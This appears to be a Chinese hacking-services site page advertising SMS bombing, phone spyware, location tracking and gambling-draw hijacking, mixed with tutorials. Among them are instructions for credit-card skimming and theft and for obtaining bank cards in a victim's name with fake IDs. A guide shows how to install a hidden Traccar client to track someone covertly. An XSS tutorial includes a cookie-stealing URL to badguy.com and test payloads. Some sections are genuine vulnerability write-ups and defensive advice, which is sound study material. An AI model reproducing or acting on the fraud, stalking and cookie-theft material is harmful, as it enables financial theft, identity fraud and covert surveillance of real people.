中国骇客云平台官网产品有需要请联系我们的广告客服!

短信轰炸延迟 云胡渣!

棋牌透视辅助!!

短信轰炸

中国骇客云平台官网因部分的国内业务调整有需求请联系下我们的客服!!!感谢大家的支持噢 ~~~~
更多软件后续视频发..因为有些不能平台发..请大家添加客服即可!感谢老客户以及大家一致以来的支持!
平台官网:www.anonymouoschina.org  www.anonymouschina.com www.hackerschina.org

微信定位刷粉

查kf

手机即使监控  间谍程序

呼死你轰炸接听..麻仁

定位装B神奇

 

资金转账无功能有显示装B神奇

胡思你轰炸!!!!
更多软件:手机改号   菠菜开奖平台  菠菜开奖劫持开奖号篡改等!

中国骇客云平台教你揭秘微信支付存在的一些安全漏洞,之前官网上面有介绍,今天另介绍一种方法提醒网民。

首先这里介绍一种微信的支付安全尝试算是一些支付的一种安全策略漏洞。|
以前官网介绍的是一种二维码直接支付免密支付一种安全漏洞,那么今天官方网站介绍一种更为牛逼的支付免密支付、
教程开始:
首先打开微信,点击+号,点击收付款,点击第一行条形码,点击上面灰色文字显示:“点击可查看付款码数字”而支付胡付款码数字一旦被泄露给黑客或者是有心人,将会造成财产损失。
这里本站测试了 中国石化加油 使用该付款码进行支付,那么这些付款均存在以上的安全支付问题,容易造成付款码泄露。
微信厂商做了实时更新付款码,但是以上安全漏洞还是可以被利用。
条形码就是把付款码存储在条形码中使用机器扫描支付,如果条形码或者以上支付二维码,支付付款码被泄露,那么就会造成用户的财产损失。
这里就不上图了……
更多请关注本站官方网站。

灰色产业之银行卡转卖以及限制额度交易变现(黑产吃黑产揭秘)因为好多人觉得灰产很赚钱!解密一下!

灰色产业链对于目前得中国市场存在很严重得漏洞缺陷和法律缺陷!那么好多人放弃了工作走向了灰色产业!这里讲一下那些黑产吃黑产得故事!
倒卖全套银行卡以及黑吃黑得案例说明:
具体得截图就不做了大家可以按照说明去做!
首先百度搜索引擎搜索:(哪里可以买到银行卡)等关键字
|或者QQ群搜索:银行卡信息  买银行卡等
接下来就是交易了:
首先找到这些能够交易得人!

卖卡人   开通资金归集功能  或者 二级账户进行最后得 资金套现,具体说明如下(第三人称)

教程开始

卖卡的“高手”,几乎都是采用你能够接受的手段成交,例如邮寄到付或淘宝交易等。一整套的卡资料,包含银行卡卡片、U遁、电话卡、开户资料、开户绑定的手机卡等,有的还配备一个老人手机,资料的完整度没有任何的瑕疵,而且价格也低到你感到兴奋。

也许你会认为,这些卖卡的人,纯粹是为了卖卡赚钱,如果是那样想,你就错了。

因为他们卖卡给你,是先给你下个诱饵,然后套你一笔更大的。这有点应了那句“免费才是最贵”的话的感觉。

其实,这些人卖卡给你,可以做到双重收益,一种是直接卖给你,赚了你买卡的钱;一种是后期套你卡上的钱,让你白白为他打工。

第一种赚钱模式,就不多说,就是买卖关系。这里,重点讲述下第二种赚钱模式,就是如何套你卡上的钱。

因为大部分人买这些卡,都是用来洗钱或者做不见光项目。于是,这些卖卡给你的人,就通过资金归集的手段,将你的辛苦赚来的昧良心的钱给转移到他提前设定的账户。

所谓的“资金归集”黑你账户,就是开通“归集功能”或“二级账户”,通过设置你金额的限制,当你的金额达到设置的额度后,账户的资金就会自动转移到另外一个设定的账户,而且这个金额是可以随意设置。

更可恨的是,对方还可以设置你的提现和转账额度。他们的玩法,就是将你的账户额度设置得比较高,而转账和提现额度就特别低。所以,这个钱基本你就提现不了。因为他拥有一级账户权限,可以将二级账户的钱转走。

觉得不错 请支持我们!后续更新..黑产得那些事情!!想赚钱?还不看过来?大揭秘!

灰产之色情网站,微信平台,QQ平台等直播平台进行擦边网赚!(揭秘)

关于色情网站,有时候不仅仅是自己的资源,只要做到引流就可以进行网赚!
教程揭秘开始:
自己做一个html页面或者直接架设一个网站,资源做嵌入式开发即可!(直接套用其他网站的资源..也可以自己买)一个网盘60块钱  10000部或者更多!
微信群,QQ群则成了交易平台:农民工啊..学生啊..这些群体很容易的!(犯法的事情咱们不干!揭秘)
…..广告业务真心可以赚钱!,但是网络就应该是绿色的!本篇文本身还有后续!但是..不想再发了!….这只是其中之一…..网络毒瘤!请大家远离!
因为近期打掉了很多app以及网站!所以…网络环境需要你我他共同维护!
不过有人就有网赚,如果你有1000个人…随便扔出多少就有收货多少!
我们仅仅是为了揭秘!我们只是告诫大家远离黄赌毒!….网络需要绿色的!感谢大家一直以来的支持!

中国骇客云教你使用U盘制作进入系统的中钥匙

如今U盘容量越来越大而且价钱越来越低,因而普及率十分之高,置信大家们也动手一个。想不想用U盘作爲开启XP大门的钥匙来维护你的爱机呢?这样他人就会由于没有对应的U盘钥匙而无法开机,平安性自是大爲进步。制造办法十分复杂,也不需第三方软件,只是应用XP本身的工具一组战略,只需3步走。

第一步:先把U盘插上,然后双击翻开“我的电脑”,检查一下本人U盘在Windows XP中

所分配的盘符,我的盘符爲K,将恣意一团体文件复制到U盘的根目录中,我把一个照片放到了外面名字爲“U.JPG”。

第二步:翻开Windows XP的记事本顺序,输出一条命令:if not exist K:\u.jpg shutdown -s -f -t

3 -c”Sorry,你不是本机主人,回绝开机!”

W~$VUM7PH}NBEX_Z@OWH1_N.jpg

其中的“shutdown”既爲关机命令,“-s”爲关机的参数,“-r”爲重启,“-f”爲强迫关机,“-t”后门跟的是倒计时3秒,“-c”提示的关机阐明。本命令的意思是:假如在K盘上我不到“U.jpg”这个文件的话,就显示”Sorry,你不是本机主人,回绝开机!”,之后过3秒就自动关机。当然,假如你在第一步中复制的是“HackerXfiles.mp3”MP3文件也行,只需在相应的命令行中修正一下就可以了。然后将文本另存爲“Check.bat”。将寄存途径定位于Windows XP’的零碎盘C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup中(由于GroupPolicy文件夹默许爲隐藏,请先在“文件夹选项”中将其显示,文件的扩展名改爲bat

型,文件名可恣意改,如hackXfiles.bat。

第三步:翻开命令符,间接按Win+R,在外面输出“gpedit.msc”。找到“本地计算机”战略——“计算机配置”——“Windows设置”——“脚本(启动/关机)”,然后双击右侧中的“启动”项;在弹出的“启动属性”窗口中单击“添加”按钮,然后在弹出的“添加脚本”窗口中单击“旅游”按钮,Windows XP会自动定位于零碎盘C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup文件夹,单击迭中刚生成的Check.bat批处置文件后在单击“翻开”按钮;之后单击一次“启动”窗口中的“确定”按钮,最初封闭组战略窗口。

OK,一把完满的U盘钥匙曾经打造出来了,只需再启动XP之前将U盘插到主机上。等运转脚本时分会判别能否存在文件“U.JPG”,假如没有发现文件就会3秒后强迫关机,拿起手中的U盘赶快试一下吧!

快速、直接的XSS漏洞检测爬虫 – XSScrapy

XSScrapy是一个快速、直接的XSS漏洞检测爬虫,你只需要一个URL,它便可以帮助你发现XSS跨站脚本漏洞。

XSScrapy的XSS漏洞攻击测试向量将会覆盖www.hackerschina.org

Http头中的Referer字段User-Agent字段Cookie表单(包括隐藏表单)URL参数RUL末尾,如 www.example.com/<script>alert(1)</script>跳转型XSS

‍‍‍‍‍‍

因为Scrapy并不是一个浏览器,所以对AJAX无能为力,我将会在未来努力实现这些功能,尽管并不容易:)

使用方法

基本检测命令

./xsscrapy.py -u http://something.com

‍‍‍‍如果你需要登陆的话,加上账号、密码作为参数即可‍‍‍‍

./xsscrapy.py -u http://something.com/login_page -l loginname -p pa$$word

检测结果将会存储在XSS-vulnerable.txt.

下载地址

‍‍‍‍‍‍

中国骇客云教你web安全测试之xss漏洞

XSS 是如何发生的呢

假如有下面一个textbox

<input type="text" name="address1" value="value1from">

value1from是来自用户的输入,如果用户不是输入value1from,而是输入 “/><script>alert(document.cookie)</script><!- 那么就会变成

<input type="text" name="address1" value=""/><script>alert(document.cookie)</script><!- ">

嵌入的JavaScript代码将会被执行

 

或者用户输入的是  “onfocus=”alert(document.cookie)      那么就会变成

<input type="text" name="address1" value="" onfocus="alert(document.cookie)">

事件被触发的时候嵌入的JavaScript代码将会被执行

 攻击的威力,取决于用户输入了什么样的脚本

当然用户提交的数据还可以通过QueryString(放在URL中)和Cookie发送给服务器. 例如下图

 

HTML Encode

XSS之所以会发生, 是因为用户输入的数据变成了代码。 所以我们需要对用户输入的数据进行HTML Encode处理。 将其中的”中括号”, “单引号”,“引号” 之类的特殊字符进行编码。

在C#中已经提供了现成的方法,只要调用HttpUtility.HtmlEncode(“string <scritp>”) 就可以了。  (需要引用System.Web程序集)

Fiddler中也提供了很方便的工具, 点击Toolbar上的”TextWizard” 按钮

XSS 攻击场景

1. Dom-Based XSS 漏洞 攻击过程如下

Tom 发现了Victim.com中的一个页面有XSS漏洞,

例如: http://victim.com/search.asp?term=apple

服务器中Search.asp 页面的代码大概如下

复制代码
<html>  <title></title>  <body>    Results  for  <%Reequest.QueryString("term")%>    ...  </body></html>
复制代码

Tom 先建立一个网站http://badguy.com,  用来接收“偷”来的信息。
然后Tom 构造一个恶意的url(如下), 通过某种方式(邮件,QQ)发给Monica

http://victim.com/search.asp?term=<script>window.open("http://badguy.com?cookie="+document.cookie)</script>

Monica点击了这个URL, 嵌入在URL中的恶意Javascript代码就会在Monica的浏览器中执行. 那么Monica在victim.com网站的cookie, 就会被发送到badguy网站中。这样Monica在victim.com 的信息就被Tom盗了.

 

2. Stored XSS(存储式XSS漏洞), 该类型是应用广泛而且有可能影响大Web服务器自身安全的漏洞,攻击者将攻击脚本上传到Web服务器上,使得所有访问该页面的用户都面临信息泄露的可能。 攻击过程如下

Alex发现了网站A上有一个XSS 漏洞,该漏洞允许将攻击代码保存在数据库中,

Alex发布了一篇文章,文章中嵌入了恶意JavaScript代码。

其他人如Monica访问这片文章的时候,嵌入在文章中的恶意Javascript代码就会在Monica的浏览器中执行,其会话cookie或者其他信息将被Alex盗走。

 

Dom-Based XSS漏洞威胁用户个体,而存储式XSS漏洞所威胁的对象将是大量的用户.

 

XSS 漏洞修复

原则: 不相信客户输入的数据
注意:  攻击代码不一定在<script></script>中

  1. 将重要的cookie标记为http only,   这样的话Javascript 中的document.cookie语句就不能获取到cookie了.
  2. 只允许用户输入我们期望的数据。 例如: 年龄的textbox中,只允许用户输入数字。 而数字之外的字符都过滤掉。
  3. 对数据进行Html Encode 处理
  4. 过滤或移除特殊的Html标签, 例如: <script>, <iframe> ,  &lt; for <, &gt; for >, &quot for
  5. 过滤JavaScript 事件的标签。例如 “onclick=”, “onfocus” 等等。

如何测试XSS漏洞

方法一:  查看代码,查找关键的变量,   客户端将数据传送给Web 服务端一般通过三种方式 Querystring, Form表单,以及cookie.  例如在ASP的程序中,通过Request对象获取客户端的变量

<%strUserCode =  Request.QueryString(“code”);strUser =  Request.Form(“USER”);strID =    Request.Cookies(“ID”);%>

假如变量没有经过htmlEncode处理, 那么这个变量就存在一个XSS漏洞

 

方法二: 准备测试脚本,

"/><script>alert(document.cookie)</script><!--<script>alert(document.cookie)</script><!--"onclick="alert(document.cookie)

在网页中的Textbox或者其他能输入数据的地方,输入这些测试脚本, 看能不能弹出对话框,能弹出的话说明存在XSS漏洞

在URL中查看有那些变量通过URL把值传给Web服务器, 把这些变量的值退换成我们的测试的脚本。  然后看我们的脚本是否能执行

 

方法三:  自动化测试XSS漏洞
现在已经有很多XSS扫描工具了。 实现XSS自动化测试非常简单,只需要用HttpWebRequest类。 把包含xss 测试脚本。发送给Web服务器。 然后查看HttpWebResponse中,我们的XSS测试脚本是否已经注入进去了。

HTML Encode 和URL Encode的区别

刚开始我老是把这两个东西搞混淆, 其实这是两个不同的东西。

HTML编码前面已经介绍过了,关于URL 编码是为了符合url的规范。因为在标准的url规范中中文和很多的字符是不允许出现在url中的。

例如在baidu中搜索”测试汉字”。 URL会变成
http://www.baidu.com/s?wd=%B2%E2%CA%D4%BA%BA%D7%D6&rsv_bp=0&rsv_spt=3&inputT=7477

 

所谓URL编码就是: 把所有非字母数字字符都将被替换成百分号(%)后跟两位十六进制数,空格则编码为加号(+

 

在C#中已经提供了现成的方法,只要调用HttpUtility.UrlEncode(“string <scritp>”) 就可以了。  (需要引用System.Web程序集)

Fiddler中也提供了很方便的工具, 点击Toolbar上的”TextWizard” 按钮

浏览器中的XSS过滤器

为了防止发生XSS, 很多浏览器厂商都在浏览器中加入安全机制来过滤XSS。 例如IE8,IE9,Firefox, Chrome. 都有针对XSS的安全机制。 浏览器会阻止XSS。 例如下图

 

如果需要做测试, 最好使用IE7。

 ASP.NET中的XSS安全机制

ASP.NET中有防范XSS的机制,对提交的表单会自动检查是否存在XSS,当用户试图输入XSS代码的时候,ASP.NET会抛出一个错误如下图

很多程序员对安全没有概念, 甚至不知道有XSS的存在。 ASP.NET在这一点上做到默认安全。 这样的话就算是没有安全意识的程序员也能写出一个”较安全的网站“。

如果想禁止这个安全特性, 可以通过 <%@  Page  validateRequest=“false”  %>

中国骇客云论你的移动终端,银行账户安全吗?

在经济发展的今天,从网络再到网络安全,你们是否注意过网络是否真的安全呢?

答案是否定的,现在随着移动终端 安卓系统的发展和滥用,编程门栏以及编程技术的不断创新,黑客们研究了种种的攻击技术以及技巧,你们是否发现了吗?这里就浅谈一下,你的银行卡数据,移动手机,与网络账户到底存在的什么关联,到底是否安全呢?

这里既发教程,又发例子,就看你们的觉悟了?我是寒龙,也是屌丝,不是什么黑客大神,所以喷子请勿喷我谢谢!

教程开始:

移动上的手机app大家都有下载,不管是安卓的app还是ios的app,下载都处于测试以及最终版本但是缺少不了移动终端漏洞,那么这些漏洞是可以被黑客挖掘甚至被利用,而一般的厂商app漏洞被黑客利用有时候轻而易举就拿到了app的数据,这里举个例子:

著作权归作者所有,转载请联系作者获得授权。

首先,题主询问“Android 应用”的安全漏洞,说到 Android 应用的安全漏洞,如果抛开系统设计问题,其主要原因是开发过程当中疏漏引起的。但其实也并不能把这些责任都怪在程序猿头上。所以本答案也将会对 Android 系统设计以及生态环境做一些阐述。(如果想了解 Android 恶意软件的情况,那就需要另开题目了。)

1. 应用反编译
漏洞:APK 包非常容易被反编译成可读文件,稍加修改就能重新打包成新的 APK。
利用:软件破解,内购破解,软件逻辑修改,插入恶意代码,替换广告商 ID。
建议:使用 ProGuard 等工具混淆代码,重要逻辑用 NDK 实现。
例子:反编译重打包 FlappyBird,把广告商 ID 换了,游戏改加插一段恶意代码等等。

2. 数据的存储与传输
漏洞:外部存储(SD 卡)上的文件没有权限管理,所有应用都可读可写。开发者把敏感信息明文存在 SD 卡上,或者动态加载的 payload 放在 SD 卡上。
利用:窃取敏感信息,篡改配置文件,修改 payload 逻辑并重打包。
建议:不要把敏感信息放在外部存储上面;在动态加载外部资源的时候验证文件完整性。

漏洞:使用全局可读写(MODE_WORLD_READABLE,MODE_WORLD_WRITEABLE)的内部存储方式,或明文存储敏感信息(用户账号密码等)。
利用:全局读写敏感信息,或 root 后读取明文信息。
建议:不适用全局可读写的内部存储方式,不明文存储用户账号密码。

3. 密码泄露
漏洞:密码明文存储,传输。
利用

  • root 后可读写内部存储。
  • SD 卡全局可读写。
  • 公共 WiFi 抓包获取账号密码。

建议:实用成熟的加密方案。不要把密码明文存储在 SD 卡上。

4. 组件暴露 (Activity, Service, Broadcast Receiver, Content Provider)
漏洞

  • 组件在被调用时未做验证。
  • 在调用其他组件时未做验证。

利用

  • 调用暴露的组件,达到某种效果,获取某些信息,构造某些数据。(比如:调用暴露的组件发短信、微博等)。
  • 监听暴露组件,读取数据。

建议:验证输入信息、验证组件调用等。android:exported 设置为 false。使用 android:protectionLevel=”signature” 验证调用来源。

5. WebView
漏洞

  • 恶意 App 可以注入 JavaScript 代码进入 WebView 中的网页,网页未作验证。
  • 恶意网页可以执行 JavaScript 反过来调用 App 中注册过的方法,或者使用资源。

利用

  • 恶意程序嵌入 Web App,然后窃取用户信息。
  • 恶意网页远程调用 App 代码。更有甚者,通过 Java Reflection 调用 Runtime 执行任意代码。

建议:不使用 WebView 中的 setJavaScriptEnabled(true),或者使用时对输入进行验证。

6. 其他漏洞

  • ROOT 后的手机可以修改 App 的内购,或者安装外挂 App 等。
  • Logcat 泄露用户敏感信息。
  • 恶意的广告包。
  • 利用 next Intent。

7. 总结
Android 应用的漏洞大部分都是因为开发人员没有对输入信息做验证造成的,另外因为 Intent 这种特殊的机制,需要过滤外部的各种恶意行为。再加上 Android 应用市场混乱,开发人员水平参差不齐。所以现在 Android 应用的漏洞,恶意软件,钓鱼等还在不断增多。再加上 root 对于 App 沙箱的破坏,Android 升级的限制。国内的 Android 环境一片混乱,惨不忍睹。所以,如果想要保证你的应用没有安全漏洞,就要记住:永远不要相信外面的世界。

[漏洞分析例子]
人学习渗透测试(主要是Web方向)有几个月了,现在算是刚刚入门。回想起学习漏洞挖掘的过程,除了看一些经典书籍外,最想看的就是大牛们挖漏洞的详细过程,比如如何寻找目标,从哪里入手,遇到问题怎么解决。但是,网上介绍知识的多,叙述过程的少(也可能是我的搜索姿势不对……)。除了在乌云上有几个大神有时会分享一些具体的挖洞思路外,大部分人还是“有图有真相,一图胜千言”。对于老司机来说,瞄一眼就知道是怎么回事了,但对于新手来说,往往是一头雾水。因此,本人分享一下最近的一次挖洞过程,希望能够抛砖引玉,大家踊跃分享自己的挖洞经验。PS:作为一个有操守的白帽子,本文重在分享思路与过程,细节处还是要打码处理,毕竟不是来提交漏洞的。

寻找目标这次是针对我常用的一个手机APP(下文简称:某APP)进行漏洞挖掘,说起来选择某APP作为目标也是挺偶然的。因为我主要是搞Web渗透测试的,并没有挖过手机APP的漏洞。有一天,在看别人分享Burp Suite的使用技巧的文章时,发现通过Burp还能够进行手机APP抓包(毕竟Too young……)。光说不练假把式,还是要自己动手操练一番。先把Burp设置一下,在Proxy中Options下的Proxy Listeners中,点击Edit,把Bind to address设置为All interfaces。

\

然后手机和电脑处于同一局域网中,给手机设置代理服务器,IP为电脑的IP地址,端口为Burp中的设置的端口,默认为8080。这时候,就可以用Burp抓取手机的请求包了。

山重水复这时候我就打开某APP,执行常见的操作,Burp中就记录了大量的HTTP数据报文。然后,就是对Burp中截获的报文进行分析了。没多久,一个请求就引起了我的注意。这是一条GET请求,请求的URL是类似下面这种格式:

http://www.example.com/path/get_some_data.jsp?id=1234567¶m1=value1¶m2=value2

直觉告诉我,这里很有可能会有越权漏洞。于是,我用浏览器打开这个URL,果然直接就看到了用户数据。换个id再试一下,把id加1,结果也是一样的,都爆出用户数据了。因此,到这里已经确定某APP存在越权漏洞。

确定这个越权漏洞存在后,稍微平复一下心情,然后就发现这个漏洞造成的后果并不严重。因为这里通过帐号越权查看到的用户数据中,并没有包含一些比较敏感的数据,比如姓名、手机号、身份证等。简单地说,就是可以越权查看到他人的数据,但是“他人”是谁并不知道,这样来说看到数据只是一堆无意义的数字而已。只钓到一条小鱼有点不甘心,于是就继续挖,应该还有其他的漏洞存在。

继续查看Burp捕获的报文,这次重点查看登录过程中提交的请求和返回的响应,想从这里入手深入挖掘一番。登录的报文如下,可以看到,只有一个POST参数params,其值经过了URL编码。

\

把params的值解码之后,发现是json格式的一串数据,基本内容如下:

\

其中,让人感兴趣的就是userId字段和body字段了,目测应该分别对应登录的用户名和密码。然后我用相同的用户名和不同的密码、不同的用户名和同样的密码分别登录、抓包,然后解码对比发现,相同的用户名对应的userId值相同,相同的密码对应的body值也相同,这就证实了我的推测。进一步分析发现,userId和body的值都是十六进制的数字串,userId的长度为32位(这里指32个十六进制字符,下同),body的长度为128位。这就说明userId和body的值都经过了加密处理。对于userId,我首先想到是不是经过了MD5?不过经过计算用户名的MD5和userId并不相等,也就是说,即便是MD5也加了salt。

分析到这里,暂时没办法继续深入了。那就先放一放,分析一下登录过程中返回的数据包,下图是登录成功之后返回的数据包。

\

一看返回的数据包直接傻眼了,明显是经过加密的。不过,这里还是要注意一下返回的数据包长度,因为我故意输入错误的密码进行登录时(如下图所示),返回的数据包长度居然相差无及!并且也能看到,有许多相同的字符。很显然,这里有很大的可能是有问题的。

\

柳暗花明到目前为止,虽然已经把登录过程中的请求报文结构都分析清楚了,但是由于报文中的关键数据都进行了加密处理,所以到现在几乎仍然是一筹莫展。事实上我在这里卡了两天,也没什么好的办法,甚至还想到过分析一下别人帐号登录过程中的数据包然后破解出密码的想法。不过仔细一想就觉得这个想法太不现实,又不是密码学专家,仅仅通过几条密文就想破解加密过程,这怎么可能成功!尽管想法有点荒唐,但是还真给我带来了灵感:既然某APP发送的报文和返回的报文都是加密的,那肯定是在某APP中进行了加密和解密的操作,那么如果能够分析一下某APP的源码,应该就能够搞清楚其中的加解密过程。那么问题来了,哪里能得到某APP的源码呢?

 

思来想去,最方便、最有可能的办法就是将某APP进行反编译得到源码。ios版的我就不想了,毕竟也没搞过ios开发,直接去逆向肯定是不现实的。但是安卓版的还是有搞头的,因为之前看过别人进行APK逆向的文章,也写过Java代码。说干就干,网上搜一搜安卓逆向教程一大堆,毕竟咱只是想分析源代码,并不是要搞脱壳破解,入门级的教程就能够满足要求,这里就不多说了。总之,将某APP反编译之后,发现代码进行了混淆,但是并不影响分析,稍微费点劲而已。经过分析,果然有收获。

首先,发现加解密使用了AES算法,并且加解密所用的密钥是16位的。

\

继续分析发现,开发人员居然把密钥“几乎”硬编码在代码中!密钥总共16位,前面几位是网站域名,再加上devId的前几位,凑够16位即是密钥。而devId在登录的请求包中是以明文出现的,这样一来,相当于加密算法和密钥我们都得到了。

\

到目前为止,分析的过程基本上就已经结束了,是时候写代码验证一下分析结果了。用Python写了AES加解密的代码,将userId和body进行解密之后发现,userId果然就是登录的用户名,而body的值则是如下json格式的字符串:

\

很明显,password的值也经过了加密,这里有可能就是计算了MD5,不过有可能加了salt。继续分析源代码,找到了对密码进行处理的过程,果然是加了salt的MD5!并且,salt也是硬编码……

\

拿自己的密码进行验证,证实了上述分析。

意外惊喜

到现在为止,已经可以伪造数据包进行模拟登录过程了。事实上,我最初的想法也是想伪造数据包模拟登录进行暴力破解的。不过,在进行暴破之前,还是先把返回的响应报文解密看看。按照之前的分析,返回的报文肯定是有问题的。

将响应报文解密之后,果然带来了更大的惊喜!前边已经提到,登录成功返回的数据包长度和失败时返回的数据包长度很接近,解密之后发现,何止是长度接近,内容也有九成是一样的!当然,这都不是重点,重点是不论登录是否成功,都返回了用户的真实数据,包括姓名、手机号、身份证号以及正确密码的哈希值,密码完全就是形同虚设。不枉费我一番心思,总算钓到大鱼!

总结漏洞挖掘的过程基本上结束了,之后提交漏洞的过程我就不废话了。整个过程写起来有点像流水账,但是却把我挖掘漏洞的过程和思路写清楚了,总结起来就是:

多看多想多动手实践,有事没事多抓包分析

Web方面的挖洞思路和软件逆向相结合,带来意想不到的惊喜

ios漏洞:

 

  文章作者 @蒸米spark 是来自香港中文大学的博士生,他为了证明这一漏洞,制作了用 URL Scheme 设计漏洞劫持微信/支付宝账号密码的 Demo。作者声明该漏洞是 iOS 系统漏洞,和支付宝、微信 App 无关,只是拿支付宝和微信作为演示漏洞的应用,其他应用同样可以中招,转发者请勿断章取义。

在未越狱的 iPhone 6(iOS 8.2)上劫持支付宝帐号密码

在未越狱的 iPhone 6(iOS 8.2)上劫持微信支付密码

原理

在 iOS 上,一个应用可以将其自身“绑定”到一个自定义 URL Scheme 上,该 scheme 用于从浏览器或其他应用中启动该应用。如果是有用过《Launch Center Pro》和《Workflow》这类 App 的朋友,应该多少明白 URL Scheme 的原理。

在正常的支付流程中,某个 App(视频上是美团)首先将订单信息通过 URL Scheme 发送给支付宝(Alipay),支付宝收到订单信息,调用支付界面,用户在支付宝上完成支付后,支付宝再发送一个 URL Scheme 给美团,美团收到付款信息后,显示团购成功的界面。

 

  在 iOS 系统中,多个应用程序注册了同一种 URLScheme 的时候,iOS 系统程序的优先级高于第三方开发程序。但是一种URLScheme 的注册应用程序都属于第三方开发,那么它们之间就没有优先级了。作者经过测试,证明系统判定优先级顺序与 Bundle ID 有关(一个 Bundle ID 对应一个应用),如果有人精心伪造 Bundle ID,iOS 就会调用 我们 App 的 URL Scheme 去接收相应的 URL Scheme 请求。

劫持过程

演示视频中“伪装”成支付宝的“FakeAlipay”,在收到美团发来的订单信息后,生成了一个和支付宝一样的登陆界面,用户在输入帐号密码后,FakeAlipay 会把帐号密码以及订单信息发送到黑客的服务器上,黑客获得这些信息后可以在自己的 iOS 设备上完成支付,并把支付成功的 URL Scheme 信息发回给 FakeAlipay,FakeAlipay 再把支付成功的 URL Scheme 信息转发给美团。这样就完成了一次被劫持的支付。

 

  此外文章中还演示了利用一个 App 使用 Google Chrome 的 URL Scheme 去劫持 Google.com 的过程,说明 Google Chrome 同样不安全,而且大家都知道像 Chrome、Facebook 的 URL Scheme 非常热门,很多第三方应用都能声明 Chrome、Facebook 的 URL Scheme 通过苹果审核,在这样的系统缺陷下,不管国内、国外、热门、冷门 App都难逃一劫。

 

  作者建议

作者在文章中表示该漏洞利用简单,修复却非常复杂,所以在 iOS 8.2 上还是未能修复。但他还是提出了几点建议让开发者参考:

1.苹果可以限制 iOS 应用不能注册别的应用的 Bundle ID 作为 URL Scheme。这样的话,使用自己的 Bundle ID 作为 URL Scheme 的接收器就会变的安全很多。

2.第三方应用可以通过①给自己发送 URL Scheme 请求来证明没有被劫持,如果没有收到自己的 URL Scheme,就可以及时给用户发送提醒;②利用 MobileCoreServices 服务中的 applicationsAvailableForHandlingURLScheme() 来查看所有注册了该 URL Schemes 的应用和处理顺序,从而检测自己、或者别人的 URL Scheme 是否被劫持。

这样不仅可以造成财产损失以及个人用户隐私泄漏等的危害,被黑客利用。

银行卡盗刷以及银行卡漏洞。

银行卡目前做的很安全,但是现在 部分银行存在闪现支付。,

漏洞证明:小额闪付功能不需要密码,视频证明可以联系官方微信索要,也就是说通过pos机直接可以刷卡并且进行支付,用户的卡是不需要密码的。不过最银行卡已经暂时取消和修复了这样的一个漏洞,但是还是免不了银行卡闪付功能。

信用卡漏洞支付:信用卡都需要密码就可以刷卡,刷卡金额可以达到百万,看你的透支卡的额度有多少。这里简单介绍一种盗刷卡教程和方法,一般刷卡都是有pos机器或者是直刷,现在网上都卖一种针孔摄像机以及其他的磁卡录制机器,很便宜。(最简单的方法是偷看)所以有了密码,其实银行卡数据是可以被复制的,用读卡器,这里的方法建议在:酒店 宾馆 ktv等娱乐场所进行操作,具体看你们的悟性。
密码可以被录制或者直接拿到(操作十分方便),卡可以被录制,其实芯片卡也不是最安全的,银行卡录制参考百度搜索:银行卡制作(前提是有银行卡数据)

接下来是盗刷………好了你们自己想象。、
【简单介绍一下个人隐私信息获取:百度一下,社工裤,通过发放充电宝,兑换人民币等方法获取个人隐私,黑客社工等】

第二种,银行卡不需要对方手机号可以进行银行卡盗取,

方法介绍如下:首先获取目标隐私信息,身份证号,手机号,等等。

拿着身份证号申请或者是制作带有磁性信息的身份证件卡、。
手机号现在有一种方法可以搞到,一种是手机号伪装,或者是基站伪装都可以的。
然后去银行去申请目标的银行卡,通过身份证件和手机号几乎是可以申请到他的信用卡或者是信用卡盗刷时候用的,最主要是欺骗银行。

一般来说银行的工作人员对安全有可能是忽略的,抓住这一点。

另外说一下:假的身份证不一定在银行不能用。|

所以说:…………….

发表这篇文章的意思是说:网络不是安全的,但是还是要时时刻刻注意网络安全,不要等财产损失才知道了。
发表这篇文章不是让人们进行犯罪,而是让广大网友都明白,要学会伪装自己不是吗?
|
本篇文章不承担一切法律后果。如果有人去学习和利用与本人没有一毛钱关系。所以要学会如何认识。请不要喷我!

GPS追踪工具Traccar中国骇客云教您玩儿转最新最全的安全工具

还是之前freebuf上的工具介绍看到的,不过看到下面有人评论说没用成功,我就把我体验的过程写一下。

点进官网能下载到服务端和客户端:

1.png

条件有几个:

1.jdk1.7

2.服务端具有公网地址

3.traccar-client在终端必须有使用GPS或网络定位的权限

先确保自己安装了jdk1.7以上版本,安装traccar 运行setup.exe。一切默认就好,就算在C盘也占空间不大。

安装好后一定要重启,然后打开Traccar的服务(如果打开不了,只能说明有安全软件拦截了,先关掉就好)。接下来安装手机端。都是手机版,总共有三种:苹果显示版,安卓显示版,安卓隐形版。(www.traccar.org/client/

所谓显示版就是正常手机应用,可以看到图标的。隐形版就看不见咯。

2.png

这张图是apk版打开的界面,显示版和隐形版界面相同

接下来先更改Device identifier。他的作用就是区分跟踪对象,因为一个服务器端traccar可以追踪很多台设备,用identifier区分,鉴于identifier是6位,那么总共可以追踪的设备总共有600000个。

3.png

我就把我的手机标记为这串数字。

接下来,写服务器端的地址,这个地址要求一定要是公网地址(当然任何局域网内也可以,只不过范围太小,其实只要客户端能跟服务端通信,都没有问题)。所以,对于一部分人来说,应该是不能很好的体验这个工具了。

4.png

接下来,看个人手机吧,我的手机用GPS几乎发送不了数据,所以只能选择网络定位,因人而异,也可以选择混合型定位方式。

5.png

当你在移动设备上完成这些操作,基本上你就可以成为一个尾随痴汉了。

打开服务器,打开服务器,输入“http://localhost:8082“就可以打开界面。登录要账户,默认admin,密码admin。

进入后左上角有个加号,点击添加一个追踪对象,名字随便写,identifier写对应的。

当手机可以发送数据数时就可以在服务器看到了,再把web服务对外开放一下,基本能随时监控了。

我出去走了一段路看了一下,定位街道位置没问题的。

测试时手机用的小米3,服务器是windows2008r2。

上次看到一个类似的工具叫opengts,有兴趣的朋友也能看一看。

论xss如何获取cookie,具体定位的实现方法!~中国骇客云联盟网(这里还有很多方法所以大家值得一看)

测试地址:www.hackerschina.org/web.html(访问用户过多时本页面定位失效,仅供测试,不会的可以到开发者进行申请自己去测试一下非常的准确注意:用户过多会导致定位失败是正常的,当你定位失败不一定代表这个测试页面一定就不行所以请不要觉得这篇文章是假的可以自己去测试一下,谢谢!社工地理位置专用文章)  本页面为精准地位可以定位用户访问浏览器或者移动端的具体位置。

http://www.gpsspg.com/maps.htm  神人提供地图查询,另外谷歌,腾讯,百度,高得地图都可以进行提供查询百度一下就i可以了。http://www.gpsspg.com/api/convert/latlng/  地图的API接口可以使用地图供应商对移动端和pc端进行精准定位具体测试请点击以上连接  测试地址。

